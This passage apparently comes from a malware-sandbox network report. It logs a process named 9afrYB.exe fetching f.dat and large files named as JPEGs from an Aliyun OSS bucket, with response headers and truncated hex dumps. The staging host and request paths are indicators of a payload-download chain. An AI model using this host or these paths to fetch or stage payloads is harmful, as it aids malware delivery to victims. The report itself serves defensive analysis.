39
                                                                                Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                                                2025-01-10 01:27:44 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                                                Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                                                2025-01-10 01:27:44 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                                                Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.549990118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:46 UTC110OUTGET /f.dat HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:47 UTC558INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:47 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 879
                                                                                Connection: close
                                                                                x-oss-request-id: 678077936FB42B383297D422
                                                                                Accept-Ranges: bytes
                                                                                ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                                Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 11142793972884948456
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000113
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                                x-oss-server-time: 8
                                                                                2025-01-10 01:27:47 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                                                Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.549992118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:48 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:49 UTC546INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:48 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 55085
                                                                                Connection: close
                                                                                x-oss-request-id: 678077943849223637A53F05
                                                                                Accept-Ranges: bytes
                                                                                ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                                Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 12339968747348072397
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                                x-oss-server-time: 2
                                                                                2025-01-10 01:27:49 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                                                Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                                                Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                                                Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                                                Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                                                Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                                                Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                                                Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                                                Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                                                2025-01-10 01:27:49 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                                                Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.549993118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:50 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:51 UTC548INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:51 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 4859125
                                                                                Connection: close
                                                                                x-oss-request-id: 67807796DF72713036BEDA59
                                                                                Accept-Ranges: bytes
                                                                                ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                                                Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 9060732723227198118
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                                                x-oss-server-time: 15
                                                                                2025-01-10 01:27:51 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                2025-01-10 01:27:51 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                                                Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                                                2025-01-10 01:27:51 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                                                Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                                                2025-01-10 01:27:51 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                                                Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
